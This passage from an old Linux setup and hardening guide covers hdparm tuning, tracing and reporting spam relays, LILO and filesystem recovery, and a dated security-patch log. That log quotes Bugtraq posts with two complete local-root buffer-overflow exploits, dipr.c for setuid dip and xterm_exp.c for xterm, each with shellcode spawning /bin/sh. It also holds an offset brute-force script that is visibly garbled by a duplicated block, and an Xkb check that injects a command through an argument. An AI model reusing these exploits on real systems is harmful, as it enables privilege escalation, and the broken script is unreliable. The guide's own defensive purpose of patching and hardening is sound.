for HDs bigger than 528MB to be properly used. - Line 5 - This mentions the technical DMA timing requirements and the possible DMA modes. - Line 6 - Mentions that this drive supports the legacy IORDY ISA line, the IORDY timing requirements, and finally, the maximum supported PIO mode. Whew! Get all that? hehehe.. don't worry about it. All you'll really care about is the 16/32bit mode, the PIO mode, and the DMA mode. Ok, so what settings is my drive currently using? Lets see: /sbin/hdparm -v /dev/hda /dev/hda: multcount = 0 (off) I/O support = 0 (default 16-bit) unmaskirq = 0 (off) using_dma = 0 (off) keepsettings = 0 (off) nowerr = 0 (off) readonly = 0 (off) readahead = 8 (on) geometry = 525/64/63, sectors = 2116800, start = 0 So, you can see that multicount is OFF, 32Bit mode is ON, etc. * Before you make any changes, do a quick NON-DESTRUCTIVE (ie. this won't hurt any of your data, etc) benchmark of your HD by doing: /sbin/hdparm -t -T /dev/hda /dev/hda: Timing buffer-cache reads: 32 MB in 1.82 seconds =17.58 MB/sec Timing buffered disk reads: 16 MB in 7.27 seconds = 2.20 MB/sec As you can see, the top figure is really a benchmark of all of the system's memory, caching, etc. (This is slow since this is only a 486-160). The second benchmark is the actual HD's read performance. Again.. this is VERY slow since I only have a Mode1 IDE controller in this system. Doh! Also, if your system has 8MB or less memory, the benchmarking might not work for you. - Ok, so lets TUNE this thing! NOTE: As you start trying to use these HDPARM commands, your system might freeze (crash). If it does, you can pretty much count on that your system not being able to run with that option. I too have done this a few times and everything came back up after a RESET. Your milage will vary and you might lose data though I have been lucky. So, first, read item #1!!! 1. Be VERY sure you have a good tape, CD-R, etc backup of your machine first. Reading the hdparm man page warns that some of these settings on a not-so-well IDE subsystems destroy your HD's data. So, YOU'VE BEEN WARNED! 2. Ok, turn on 32bit transfers on your first HD by typing in "/sbin/hdparm -c3 /dev/hda". Once that is turned on, benchmark your HD again with the "/sbin/hdparm -t -T /dev/hda". Any improvement? NOTE: On my 486 system with the lame IDE controller, I didn't see much. 3. Next, turn on the HD's blocking mode if it isn't currently already set. To do this, get the max blocking mode using "/sbin/hdparm -I /dev/hda" and then enter in the MaxMultSect number into the command (example here is 16): "/sbin/hdparm -m16 /dev/hda". After this setting, rebenchmark your HD. NOTE: As mentioned in the hdparm man page, some drives will actually run SLOWER with higher BLOCK modes. Because of this, I recommend that you try multiple sizes and then re-benchmark the HD. 4. Lastly, for those of you with Mode3/4 IDE controllers with EIDE or UDMA HDs, enable the Mode3 or Mode4 PIO and UDMA mode if it isn't already set. NOTE: This is where it begins to get risky. I truely recommend that you read the hdparm man page on the -d, -p, and -X options. If you are ready to try it, run the command: "/sbin/hdparm -d1 -X34 /dev/hda" Now re-run the system benchmark and see what performance differences you've gained. ================================================================================ ================================================================================ Section 50 - SPAM: Dealing with it and helping others stop it This section has two peices: SPAM Web Crawlers: SPAM: ----- As you add WWW pages to the Internet, post messages to UseNET newsgroups, etc, you will find yourself getting MORE and more SPAM email. One or two SPAMs a week is ok (I suppose) but once you start getting 10+ a week, I got annoyed. First, a few things should be understood about SPAM: 1. When you receive a SPAM email, the SENDERs almost never use their own email servers to send them out. They are usually using someone else's mis-configured email MTA (mail transfer agent)to do it. You might think this isn't that big of a deal but consider: A. it is filling up the relayer's internet connection with SPAM traffic that has NOTHING to do with their normal business. B. for each email the SPAMER sends to this relay site, thousands to tens of thousands emails leave. This saturates the email server, its overall performance, etc. C. their entire Internet domain could be blocked from the internet via the various anti-SPAM systems (RBL, ORBS, etc). Ok.. so you got a peice of SPAM. How can you tell what is really going on? Here is one SPAM I received. Bare with the length here but its important to see ALL their tactics here: 1. If you were to simply REPLY to this "FROM" address, the email would bounce because it is fordged and totally bogus. 2. The only way to get ahold of these people is to call some toll free number. 3. SPAMs sometime say this email meets "compliance with the proposed Federal legislation". Why? Because they offer a way to unsubscribe from from their list. But.. A. They usually use those free internet email services out there (hotmail, yahoo, etc) to do this. Not their real email addresses. B. They never read the complaints the receive but they DO use it those hate emails to confirm that your email address is VALID. Once they know your email address is valid, they either send more spam to you or sell your address to some other spammer. ** This is why its CRITICAL to NOT to never reply to these addresses ** C. By using these free email services, the spammers are breaking those service's Anti-SPAM rules. The email without full headers: ------------------------------------------------------------------------------ From: "Barbara23347@powerworx.net" Subject: Dental & Optical Plan Savings - Limited Time Only Date: Wed, 21 Oct 1998 06:15:00 -0400 (EDT) Hello, We work with a group of your local doctors and dentists and are offering a Dental - Optical Plan that runs approximately $3 a week for an individual and 4 a week for the entire family with no limit to the number of children. Would you like our office to furnish you with the details? Call Toll-Free 1-800-929-7648 "Refer to the K601 offer." (be sure to give this) *If your state is listed below then we currently do not service your area. ************************************************* We are linked to plenty of web sites that offer free subscriptions to our mailing list. You may JOIN or LEAVE this list at any time by following the simple instructions that can be found at the end of this email. You are on our mailing list because you have subscribed at one of our associate web sites, sent us email or we have a previous online relationship. Marketing Service Co. Customer Service Department 1-913-562-0134 This message is being sent to you in compliance with the proposed Federal legislation for commercial e-mail (S.1618-SECTION 301). "Pursuant to Section 301, Paragraph (a)(2)(C) of S. 1618, further transmissions to you by the sender of this e-mail may be stopped at no cost to you by clicking here and placing REMOVE in the subject. ************************************************* ------------------------------------------------------------------------------ Ok, so where did this email REALLY come from and how can your STOP this SPAM in the future? Well, first, you need to enable your email reader to show the FULL EMAIL HEADERS. Pine: Goto the main Setup-->Config menu and enable the following commands: enable-aggregate-command-set enable-full-header-cmd include-header-in-reply Now, when you read an email, hit the "H"eaderMode or "h" key and you will see the FULL headers. Eudora: Click on the "Blah..Blah..Blah" icon Now, here is that SAME email with full headers: 1. Little different eh? Confusing even. Which site actually SENT this email? Was it someisp.net, mailcity.com, popsite.net, or powerworx.net? First, the various lines like X-Persona and other X-stuff don't really matter. They are there more for information reasons. You really want to look at the "received" line. Ok, for the following example, there are TWO internet domains there. Usually, you won't see two domains like this but BOTH are valid. This particular email server is configured to send/receive for both mailcity.com and popsite.net. The email with full headers: ------------------------------------------------------------------------------ X-Persona: Received: from mta-mail.mailcity.com (02-070.038.popsite.net 209.198.10.70]) by someisp.net (8.9.3/8.9.3) with SMTP id DAA16082; Thu, 9 Sep 1999 03:18:16 -0700 (PDT) Message-ID: From: "Barbara23347@powerworx.net" Subject: Dental & Optical Plan Savings - Limited Time Only Date: Wed, 21 Oct 1998 06:15:00 -0400 (EDT) MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-UIDL: fcfe6e177a9ad2665891d53ba4e141aa Hello, We work with a group of your local doctors and dentists and are offering a Dental - Optical Plan that runs . . . ------------------------------------------------------------------------------ So.. now what? Well, you need to take this email with FULL headers and forward it to the correct people. For this example, I emailed: abuse@popsite.net, postmaster@popsite.net, abuse@mypad.com and postmaster@mypad.com 1. Why use the "popsite.net" address over the "mailcity.com" address? No reason, either would have worked. 2. Why the abuse and postmaster addresses? The abuse address is well known for notifying remote sites about SPAM problems. The postmaster address is well known as the address for the email server administrator. 3. Why the mypad.com address too? I also email these these people because ANYONE associated with SPAMMERS will almost ALWAYS discontinue the spammer's account. This is a very effective way to shut spammers down. From here, I recommend to prepend the original spammer's subject field with "SPAM:" and also to start the email body off with something like: -- Spam Alert: popsite: You are relaying spam. Please fix your MTA mypad: Please delete this account Then add the original spam email with ALL the headers. . . . -- -- Thats it! You will probably get an automated email back from the various sites letting you know you that they receive your email and they will act upon it. Some sites will personally email you back telling you that they delt with it. So.. thats it. Right? NOPE. Many of these sites will still relay email for spammers though you've ASKed and asked them to stop. What to do? Report them! To who? Goto these recognized Anti-SPAM sites: Is the relay already filtered: Report it: ------------------------------ ---------- RBL: http://maps.vix.com/cgi-bin/lookup http://maps.vix.com/rbl/reporting.html Orbs: http://www.orbs.org/verify1.cgi http://www.orbs.org/email.cgi IMRSS: http://www.imrss.org http://www.imrss.org/cgi-bin/query.cgi IMRSS DSSL: http://www.imrss.org http://www.imrss.org/cgi-bin/dssl/query.cgi RRSS: http://relays.radparker.com/nph-lookup.cgi http://relays.radparker.com/nph-submit.cgi PS. Be SURE that you are using some of these filtering systems via your Sendmail setup. Check out the Sendmail section [Section 25], for more details. ----- Web Crawlers: ------------- If you get several firewall hits that looks like: -- Sep 12 11:15:13 roadrunner kernel: IP fw-in rej eth0 UDP 209.249.159.162:137 100.200.0.0:137 L=78 S=0x00 I=32141 F=0x0000 T=57 -- Try TELNETing to that site. You will then see: -- [root@roadrunner]# telnet 209.249.159.162 Trying 209.249.159.162... Connected to 209.249.159.162. Escape character is '^]'. UNAUTHORIZED ACCESS!!! You are not authorized to connect to this host. Violations will be prosecuted to the full extent of the law. See http://scour.net/General/Misc/AddSite.phtml#remove for information on removing your host from our SMB crawler. Connection closed by foreign host. -- What the hell is this? Its a Web Crawler that is trying to index everyone's insecure Microsoft File & Print shares. Personally, these people make me sick by doing this but they DO allow you a way to disable it. Goto the URL shown above and remove your box from their SMB crawler. ================================================================================ ================================================================================ Section 51 - FS Recovery: How to fix LILO and file system problems Lets say that one day, you have to reboot your machine to install new hardware, find your machine CRASHED, etc. Upon reboot, you see an error like: - LI (LILO never fully loads.. it just sits there) or - The kernel loads up fine but then says: "Vfs cannot open root device 08:11 kernel panic :vfs:unable to mount root fs on 08:11" -- First, ask yourself: A. What has changed recently? Did you add/remove any hard drives recently? Keep this in mind: With IDE drives, they ALWAYS get the same name. IDE0-Drive0 is always /dev/hda and IDE1-Drive1 is always /dev/hdd. With SCSI drives, they get their name dynamically. So if you have drives on SCSI ID 0, 4 and 5, you would have /dev/sda, /dev/sdb, and /dev/sdc (NOTE the lack of correspondance from the SCSI ID # and the drive name). NOW, lets say ID #4 DIED. Upon reboot, you would NOW see /dev/sda and /dev/sdb. Notice that old /dev/sdc is now "b". Sucks huh? This really can screw things up, especially for software RAID setups!!! Hopefully, this naming issue might be fixed in the 2.4.x kernels. B. What drive do you boot from? /dev/hda or /dev/sda C. What drive is your / partition on? /dev/hdaX, /dev/sdaX, etc ** For this example, I'm going to assume /dev/hda5 ** First, create a set of Linux RESCUE diskettes. This is done using "RAWRITE" or "dd" from images on your CDROM, an FTP server on the Inet, etc. You will need the BOOT and RESCUE images put onto diskettes. Next, after you load up the rescue disks: 1. Mount you suspected "/" [root] partition (mkdir /mnt/mnt; mount -t ext2 /dev/hda5 /mnt/mnt) Is everything there in /mnt/mnt as you expect? A. No? Make sure you mounted the right partition. If you are *SURE* this is the right partition, umount this partition (umount /mnt/mnt). Run "fdisk /dev/hda" and make sure all your partitions are there. If they are good. If they aren't, umount this partition, reboot and go into the CMOS setup. Now, make SURE that your CMOS setup for the HDs (number of cylinders, heads, sectors, TRANSLATION) is configured the SAME way as when you installed Linux. I have seen a few times where the TRANLATION settings were toggled from LBA to NORMAL or AUTO was being unreliable. For large HDs (> 1GB), it should be set to LBA. NOTE: I do NOT recommend the use of "AUTO". Upon reboot, re-run fdisk and hopefully your parition tables are ok. If not, I hope you documented your partition tables much like I did TrinityOS. If you didn't, you have a few last options. Email me and I can give you some notes on how to rebuild a FS from the SuperBlocks or you can try some of the tools below. Please note that these tools might not be around anymore or there are now newer/better ones. If you know of other disk tools for Linux, please let me know. Thanks to Harondel Sibble for this list ----------------------------------------------------------------- (i) findsuper is a small utility that finds blocks with the ext2 superblock signature, and prints out location and some info. It is in the non-installed part of the e2progs distribution. (ii) rescuept is a utility that recognizes ext2 superblocks, FAT partitions, swap partitions, and extended partition tables; it prints out information that can be used with fdisk or sfdisk to reconstruct the partition table. It is in the non-installed part of the util-linux distribution. (iii) fixdisktable (http://bmrc.berkeley.edu/people/chaffee/fat32.html) is a LINUX utility that handles ext2, FAT, NTFS, ufs, BSD disklabels (but not yet old Linux swap partitions); it actually will rewrite the partition table,if you give it permission. (iv) gpart (http://home.pages.de/~michab/gpart/) is a utility that handles ext2, FAT, Linux swap, HPFS, NTFS, FreeBSD and Solaris/x86 disklabels, minix, reiser fs; it prints a proposed contents for the primary partition table, and is well-documented. ----------------------------------------------------------------- Reboot into the rescue disk and try again. If things still aren't right, you are in a last ditch situation. The filesystem is probably a mess. Cross your fingers NOW and follow the next step. B. Yes? Now unmount it (umount /mnt/mnt) and run a file system check on it. (e2fsck /dev/hda5) Make sure everything is cleaned up. You might be prompted if you want to fix things along the way. Say "Yes". If "e2fsck" it cannot complete, email me again and I can tell you how to do some final last tricks before you have to just format and restore / re-install. C. Remount the / partition as show in A. 2. In /mnt/mnt/etc/lilo.conf, make sure that the "boot" line points to the correct boot drive (boot=/dev/hda). NOTE: there should not be any NUMBER after the drive letter. This means its using the Master Boot Record or MBR to boot. 3. In the TOP most "image" section, make sure that: - the specified "image" file exists in /mnt/mnt/boot - the specified "root" line is your actual partition for the / drive. - Exit out of the editor and save any changes 4. In /mnt/mnt/etc/fstab, make sure that the line that has the "/" in the second column reflects the correct drive and partition of your / partition. You should also confirm this for the possible other partitions like /var, /usr, /tmp, /home, etc. 5. Ok, here comes the magic if you DID make any changes to /etc/lilo.conf, run the following command from the rescue diskette lilo -C /mnt/mnt/etc/lilo.conf -r /mnt/mnt If everything goes well, you should see lilo run and print out all of your configured kernels with the top-most one with a "*" next to it. 6. Reboot and hopefully things are ok now. ================================================================================ ================================================================================ Section 52 - Installing a new version of TAR to support Bzip2 ================================================================================ ================================================================================ Section 60 - Final Security and up-to-date Linux Security & patching All users should apply patches to their respective Linux installation: 1. upon the first time the machine is installed 2. at least every week after that to stay ontop of the newest bug and security fixes To find out what are the current security issues with Linux, etc, check out the Security URLs in [Section 5] --- --- --- NOTE: This is where Redhat RPMs, and Debian upgrade files really shine and blow away Slackware .PKG files! NOTE #2: Be careful of where you download your newer versions of source code, RPMs, etc. Recently, ftp://win.tue.nl was hacked and the hackers put trojan'ed versions of TCP-wrappers and Linux-utils on their site. Because of this, many user's passwords were sent to the hacker's email address, etc. Not good. In the future, I will cover how to verify the package's authenticity with PGP. Redhat users: Depending on when you purchased your CD, your CD might already have these RPMs installed so if it says the RPM is already installed, just skip it. ************************* ** Be cautious with RPMs ** Before you blindly start installing new patch RPMs or even new software in RPM form, you really should (quickly) inspect the RPM archive to make sure it looks ok. For example, lets say you are going to install a new Sendmail RPM: First, download the new Sendmail RPM file and put it to some location for future reference. I personally put all files in /usr/src/archive as described in the top of [Section 5] Now show the RPM creator's notes: rpm -qip sendmail-*.i386.rpm Show the RPM's file contents: rpm -qlp sendmail-*.i386.rpm | more - Next, if you already have an older Sendmail RPM installed, make sure that the new RPMs won't clober your old configuration files: rpm -Uv --test sendmail-*.i386.rpm For even more info (I'd recommend it), do: rpm -Uvv --test sendmail-*.i386.rpm - With a little cautious looking, you'll know what will happen if you install this new RPM. Ok? If the new Sendmail installation is going to copy over your original files, the RPM will -usually- make a backup of your configuration files and add a ".rpmsave" to it. *** ****************************** Redhat users #2: I have noticed that the "rpm" program will crash (coredump) about 60% of the way through a wildcard (*.rpm) RPM upgrade process. You should be able to safely figure out what patches it failed to install and do them manually or by doing the following: Say that the RPM program died while doing patching in the letter range (Q). So, do this to install all patches from Q to Z. "rpm -Uvh [q-zQ-Z].rpm ************************ ** Patching your Redhat system ** Now, to find out if any new RPM files exist for Redhat, goto http://www.redhat.com/support/docs/errata.html and then look at the upper right-hand corner's date. If this date is NEWER than the 00readme.errata file, then there are newer RPMs. Their documentation system read SUCKS in terms of though there might be a NEWER RPM for Glibc, they mearly update the DATE in the previous Gblic errata entry. Lame eh? So, you will have to page though the different errata listing to find what newer-date entries have been added. *** ****************************** ---- Various RPMs, permission fixes, etc... /etc/profile -- rm ~$LOGNAME/.bash_history -- - Fix BRU if it is installed: chmod 1777 /usr/local/lib/bru (assuming root login) or My /usr/local/lib/bru directory is 775, works fine (as expected) from root. great Security URLS: ftp://ftp.win.tue.nl/pub/security sendmail: 8.8.6.1 KSR[T] Advisory #003 Date: Aug 05, 1997 ID #: lin-cron-003 Operating System(s): Redhat linux 4.1, SuSE Linux 5.0, Slackware 3.3 Affected Program: updatedb / crontabs Syn Attack logs: http://www.whitefang.com/synlog.html IP filtering: ftp://ietf.org/internet-drafts/draft-ferguson-ingress-filtering-03.txt CRON exploit: ftp://ftp.freesoftware.com/pub/linux/slackware-3.4/slakware/a2/bin.tgz psaux: The Quick fix: chmod 660 /dev/psaux 2/9/98: Xkb 1. as usual chmod u-s,g-s all installed Xserver binaries (*) Quick vulnerability check $ Xserver -xkbdir ':;id > /tmp/I_WAS_HERE;' [exit X server] $ grep root /tmp/I_WAS_HERE && echo 'Gotcha!' * remove setuid/setgid bit from all installed Xservers * use xdm or a safe setuid wrapper to start Xserver 2/9/98: Device Dos ls -l /dev/* | grep "r-- " chmod ;) 2/9/98: Upgrade to ld.so v1.9.5 or better.. 2/9/98: The patch corrects the coredump error in both imapd and ipop3d (the pine version of pop3 server). Patch is against pine 3.96 diff -ru log_lnx.c.orig log_lnx.c --- log_lnx.c.orig Tue May 2 00:08:20 1995 +++ log_lnx.c Thu Feb 5 08:49:31 1998 @@ -55,7 +55,8 @@ /* allow case-independent match */ if (!pw) pw = getpwnam (lcase (strcpy (tmp,user))); /* no entry for this user or root */ - if (!(pw && pw->pw_uid)) return NIL; + if (!(pw)) return NIL; + if (!(pw->pw_uid)) return NIL; if(!(spw = getspnam (pw->pw_name))) return NIL; /* validate password */ if (strcmp (spw->sp_pwdp,(char *) pw_encrypt(pass,spw->sp_pwdp))) return NIL; 2/9/98 chmod 700 /dev/zero Date: Fri, 6 Feb 1998 07:59:46 +0100 2/9/98 Xconfigurator issue (if installed) chmod 700 Xconfigurator Date: Fri, 6 Feb 1998 07:59:46 +0100 2/9/98 Remove all old versions of /lib/libc.so.x 2/9/98 Upgrade linux-ld.so.x 4/6/98 Security "chmod 700" the following files: /tmp overwrite exploit /sbin/Liloconfig (already good perms) /sbin/pkgtool.tty and /usr/lib/setup.cpkgtool (fixed) /sbin/makebootdisk (fixed) /sbin/netconfig.tty and netconfig.color (fixed) 4/19/98: Here is a patch for the "Off by one IP header bug. Put the following into a file (ie: offbyone.patch) in /usr/src/linux and apply it by running "patch -p1 < offbyone.patch". [This is FIXED in 2.0.35] ---- --- ip_fragment.c.old Thu Apr 16 12:25:34 1998 +++ ip_fragment.c Thu Apr 16 12:29:02 1998 @@ -375,7 +375,7 @@ fp = qp->fragments; while(fp != NULL) { - if (fp->len < 0 || count+fp->len > skb->len) + if (fp->len < 0 || fp->offset+qp->ihlen+fp->len > skb->len) { NETDEBUG(printk("Invalid fragment list: Fragment over size.\n")); ip_free(qp); ---- Now, re-compile the kernel, move the kernel to /boot, update the /etc/lilo.conf file, re-run "lilo", and reboot. 4/22/98: [linux-security] SECURITY: procps 1.2.7 fixes security hole 5/8/98: Dip and Xterm exploits: The following code causes a buffer overrun in dip-3.3.7o that comes with linux slakware version 3.4 and maybe others. It can give you root permission if dip file is owned by root and set-user-id bit is set. This problem was mentioned in this list some days ago by Goran Gajic, and he has also posted some possible ways to correct it. The code is too messy... but it works. Regards, zef ------------------------------ dipr.c ----------------------------- /* * dip-3.3.7o buffer overrun 07 May 1998 * * sintax: ./dipr * * * offset: try increments of 50 between 1500 and 3000 * * tested in linux with dip version 3.3.7o (slak 3.4). * * by zef and r00t @promisc.net * * http://www.promisc.net */ #include #include static inline getesp() { __asm__(" movl %esp,%eax "); } main(int argc, char **argv) { int jump,i,n; unsigned long xaddr; char *cmd[5], buf[4096]; char code[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; jump=atoi(argv[1]); for (i=0;i<68;i++) buf[i]=0x41; for (n=0,i=68;i<113;i++) buf[i]=code[n++]; xaddr=getesp()+jump; buf[i]=xaddr & 0xff; buf[i+1]=(xaddr >> 8) & 0xff; buf[i+2]=(xaddr >> 16) & 0xff; buf[i+3]=(xaddr >> 24) & 0xff; buf[i+4]=xaddr & 0xff; buf[i+5]=(xaddr >> 8) & 0xff; buf[i+6]=(xaddr >> 16) & 0xff; buf[i+6]=(xaddr >> 16) & 0xff; buf[i+7]=(xaddr >> 24) & 0xff; cmd[0]=malloc(17); strcpy(cmd[0],"/sbin/dip-3.3.7o"); cmd[1]=malloc(3); strcpy(cmd[1],"-k"); cmd[2]=malloc(3); strcpy(cmd[2],"-l"); cmd[3]=buf; cmd[4]=NULL; execve(cmd[0],cmd,NULL); } ------------------------------- end ------------------------------- Shell script for easy testing :-) ---------------------------- dipr.test ---------------------------- #/bin/bash if [ ! -x /sbin/dip-3.3.7o ] then echo "could not find file \"/sbin/dip-3.3.7o\""; exit -1 fi if [ ! -u /sbin/dip-3.3.7o ] then echo "dip executable is not suid" exit -1 fi if [ ! -x ./dipr ] then echo "could not find file \"./dipr\""; echo "try compiling dipr.c" exit -1 fi x=2000 false while [ $x -lt 3000 -a $? -ne 0 ] fi if [ ! -u /sbin/dip-3.3.7o ] then echo "dip executable is not suid" exit -1 fi if [ ! -x ./dipr ] then echo "could not find file \"./dipr\""; echo "try compiling dipr.c" exit -1 fi x=2000 false while [ $x -lt 3000 -a $? -ne 0 ] do echo offset=$x x=$[x+50] ./dipr $x done rm -f core ------------------------------- end ------------------------------- Approved-By: aleph1@NATIONWIDE.NET X-Sender: andrea@dragon.bogus X-Public-Key-URL: http://www-linux.deis.unibo.it/~mirror/aa.asc Date: Fri, 8 May 1998 16:50:05 +0200 Reply-To: Andrea Arcangeli Sender: Bugtraq List From: Andrea Arcangeli Subject: xterm exploit [TOG issue] To: BUGTRAQ@NETSPACE.ORG /* xterm_exp.c : linux/x86 xterm.Xaw exploit by alcuin - 5/4/98 - [ http://www.rootshell.com/ ] It works against both Xaw and neXtaw widgets NB: you have to cp ~/.Xdefaults.old ~/.Xdefaults to be able to use xterm again. */ #include #include #include unsigned int getsp() { asm("mov %esp,%eax"); } inline rootshell(){ __asm__( "movb $0x56, %al\n\t" "l1:cmpb $0x12, %al\n\t" "je l2\n\t" "movb $0x12,%al\n\t" "call l1\n\t" "l2:pop %esi\n\t" "xorl %eax,%eax\n\t" "movb $0x25, %al\n\t" "addl %eax,%esi\n\t" "movl %esi,%ebx\n\t" "movl %esi,%edi\n\t" "movb $8,%al\n\t" "addl %eax,%edi\n\t" "movb $5,%al\n\t" "addl %eax,%esi\n\t" "movl %esi,(%edi)\n\t" "movl %edi,%ecx\n\t" "incl %edi\n\t" "incl %edi\n\t" "incl %edi\n\t" "incl %edi\n\t" "xorb %al,%al\n\t" "movl %eax,(%edi)\n\t" "movl %edi,%edx\n\t" "movb $0xb,%al\n\t" "int $0x80\n\t" ".string \"/bin/sh\"\n" ); } #define CONFFILE ".Xdefaults" #define OLDFILE ".Xdefaults.old" #define NEWFILE ".Xdefaults.new" main (int argc, char **argv) { char *home; FILE *f_in, *f_out; char buf[16384]; char shellbuf[16384]; char *s; int i; unsigned int sp=getsp(); if (home = getenv("HOME")) chdir(home); if (!(f_out = fopen(NEWFILE, "w"))) { perror("fopen"); exit(1); } if (f_in = fopen(CONFFILE, "r")) { fseek(f_in,0,SEEK_SET); while (!feof(f_in)) { fgets(buf,16384,f_in); for (s=buf;isblank(*s);s++); if (strncmp(s,"xterm*inputMethod",17)<0) fputs(buf,f_out); } fclose(f_in); } /* fill the buffer with nops */ memset(shellbuf, 0x90, sizeof(shellbuf)); shellbuf[sizeof(shellbuf)-1] = 0; /* write the return adress */ s = shellbuf+2052; *(int *)s=sp+0x69F5; /* write the root shell code */ s = shellbuf+2800; strcpy(s,(char*)rootshell); fputs("xterm*inputMethod:",f_out); fputs(shellbuf, f_out); fclose(f_out); system("/bin/cp "CONFFILE" "OLDFILE); system("/bin/mv -f "NEWFILE" "CONFFILE); execl("/usr/X11R6/bin/xterm","xterm",NULL); } I can' t reproduce the problem with the latest Debian compiled XFree86: andrea@dragon:~$ dpkg -l xbase Desired=Unknown/Install/Remove/Purge | Status=Not/Installed/Config-files/Unpacked/Failed-config/Half-installed |/ Err?=(none)/Hold/Reinst-required/X=both-problems (Status,Err: uppercase=bad) ||/ Name Version Description +++-===============-==============-============================================ ii xbase 3.3.2-4 local clients and configuration required by Andrea[s] Arcangeli ---- ======================================================================= See the updated master RPM guide at the TOP of this section ======================================================================= Applied the following patches on 5/30/98: rpm -Uvh --force --nodeps rpm-2.5.1-1.i386.rpm rpm -Uvh glibc-2.0.7-13.i386.rpm rpm -Uvh glibc-devel-2.0.7-13.i386.rpm Applied the following on 6/1/98 to fix the --nodep issue: rpm -Uvh patch-2.5.2.i386.rpm 6/13/98 - SSH 1.2.25 update. There is a new SSH exploit that requires that users upgrade to 1.2.25 ASAP!!!! See the SSH chapter, section 29, for URLs. 6/15/98 - installed bootp, metamail, dhcpcd, minicom, dhcp, xscreensaver, findutils, X11, mailx RPMS 6/20/98 - Changed perms of /usr/bin/lpr to (chmod 700 /usr/bin/lpr) due to some security issues. 7/1/98 - Changed the perms of /usr/X11R6/bin/seyon to (chmod 700) due to security issues 7/4/09 - implemented the new RPMs for: slang libtermcap rpm I *SKIPPED* the Tin upgrade since I installed Tin v1.4beta. I *SKIPPED* the Bind v4.9.x upgrade since I'm running Bind 8.1.2T3 7/8/98 - implemented the new dosemu-0.66.7-7.i386.rpm and libtermcap-2.0.8-9.i386.rpm fixes. 7/13/98 - implemented the new samba-1.9.18p7-2.i386.rpm RPM due to security issues 7/14/98 - Just after Pine 4.00 was released, we were made aware of a security problem with the imapd server that is included in the Pine 4.00 distribution. This will be fixed in the Pine 4.01 maintenance release, but in the mean time, if you are using the UW IMAP server, please update it with the following distribution: ftp://ftp.cac.washington.edu/mail/imap.tar.Z We don't have new imapd binaries available yet. Pine itself is not affected. 7/28/98 - implemented the following RPMs: NOTE: Upon installation of the initscripts RPM, you will need to re-do ALL network optimizations from [Section 16] + ncurses-1.9.9e-9.i386.rpm + ncurses-devel-1.9.9e-9.i386.rpm + imap-4.1.final-1.i386.rpm (installed the RPM though TrinityOS disables IMAP) + elm-2.4.25-14.i386.rpm + glibc-2.0.7-19.i386.rpm + glibc-debug-2.0.7-19.i386.rpm + glibc-devel-2.0.7-19.i386.rpm + glibc-profile-2.0.7-19.i386.rpm + Xconfigurator-3.26.1-1.i386.rpm + initscripts-3.67-1.i386.rpm This RPM changes the following files but it makes backups of your old files: /etc/ppp/ip-up /etc/rc.d/rc.sysinit /sbin/ifup + modutils-2.1.85-4.i386.rpm + findutils-4.1-24.i386.rpm - Removed SUID bit from the /usr/bin/dumpreg program due to a kernel crash issue chmod 755 /usr/bin/dumpreg 8/8/98 - implemented the following RPMs: + mutt-0.91.1-5.i386.rpm + SysVinit-2.74-4.i386.rpm 8/11/98 - implemented the apache-1.2.6-5.i386.rpm RPM NOTE: If you are NOT using apache yet but still installed the RPM, you will start getting Log Rotate errors. To fix this, do the following: mkdir /etc/logrotate.d.disabled mv /etc/logrotate.d/apache /etc/logrotate.d.disabled/apache 8/17/98 - implemented the svgalib-1.2.13-5.i386.rpm to fix a console DoS. 8/22/98 - implemented the LinuxConf linuxconf-1.11r19-1.i386.rpm RPM to fix a /tmp DoS hack for Redhat 5.1+ distros 8/28/98 - implemented the nfs-server-2.2beta29-7.i386.rpm and nfs-server-clients-2.2beta29-7.i386.rpm patches to fix NFS (again..) 8/31/98 - There is a buffer overflow DoS attack on Minicom, to fix this, run "chmod 700 /usr/sbin/minicom" 9/20/98 - Installed the xscreensaver-2.27-1.i386.rpm to fix core dumps with xlyap 10/10/98 - De-installed the following tools: rpm -e fstool usercfg cabaret I have also installed several other RPMs from Redhat's update page. Please follow 10/31/98 - Installed 5.0 RPMS + bash-1.14.7-11.i386.rpm + imap-4.1.final-1.i386.rpm + netscape-navigator-4.06-2.i386.rpm + nfs-server-2.2beta29-7.i386.rpm + nfs-server-clients-2.2beta29-7.i386.rpm + pcmcia-cs-2.9.12-3.i386.rpm + rpm-2.5.3-5.0.i386.rpm + rpm-devel-2.5.3-5.0.i386.rpm + xscreensaver-2.27-1.i386.rpm 5.1 RPMs + fetchmail-4.5.3-1.i386.rpm + glint-2.6.1-1.i386.rpm + ispell-3.1.20-9.i386.rpm + man-1.5d-3.i386.rpm + xosview-1.5.1-4.i386.rpm 11/05/98 - Installed + svgalib-1.2.13-6.i386.rpm + svgalib-devel-1.2.13-6.i386.rpm + zgv-3.0-0.5.0.i386.rpm 11/13/98 - Installed + libc-5.3.12-28.i386.rpm 11/15/98 - Installed: + sysklogd-1.3-26.i386.rpm + samba-1.9.18p10-5.i386.rpm 12/01/98 - Disabled RZ and SZ due to the fact that LRZ creates files of 0666 though the UMASK might be different. chmod 700 /usr/bin/lrz chmod 700 /usr/bin/lsz 12/17/98 - Added updated RPMs for issues with Netscape, FTP, Xwindows netscape-common-4.08-1.i386.rpm netscape-communicator-4.08-1.i386.rpm netscape-navigator-4.08-1.i386.rpm ftp-0.10-4.i386.rpm XFree86-libs-3.3.3-1.i386.rpm XFree86-3.3.3-1.i386.rpm 12/29/98 - Added 1 RPM pam-0.64-4.i386.rpm 02/10/99 - Added 1 RPM to fix a root-compromise FTP bug ftp://updates.redhat.com/5.2/i386/wu-ftpd-2.4.2b18-2.1.i386.rpm NOTE: Though not included with Slackware or Redhat, ProFTPd which comes with Debian Linux is vunerable too. Upgrade to version 1.2.0pre1-2 or better. 02/11/99 - There is a Lynx /tmp race and ALL versions of Lynx less than v2.8.1 are vunerable. Until you update your Lynx code, DISABLE it: chmod 700 /usr/bin/lynx 02/15/99 - The "Super" program, similar to "su" on Debian Linux has a root exploit. Upgrate to at least v3.11.7. ftp.onshore.com:/pub/mirror/software/super 02/17/99 - There is a root exploit against /usr/sbin/lsof. Change its perms to 0755 02/19/99 - Installed the lsof-4.40-1.i386.rpm to fix the security issue announced on 2/17/99 - Debian has released the 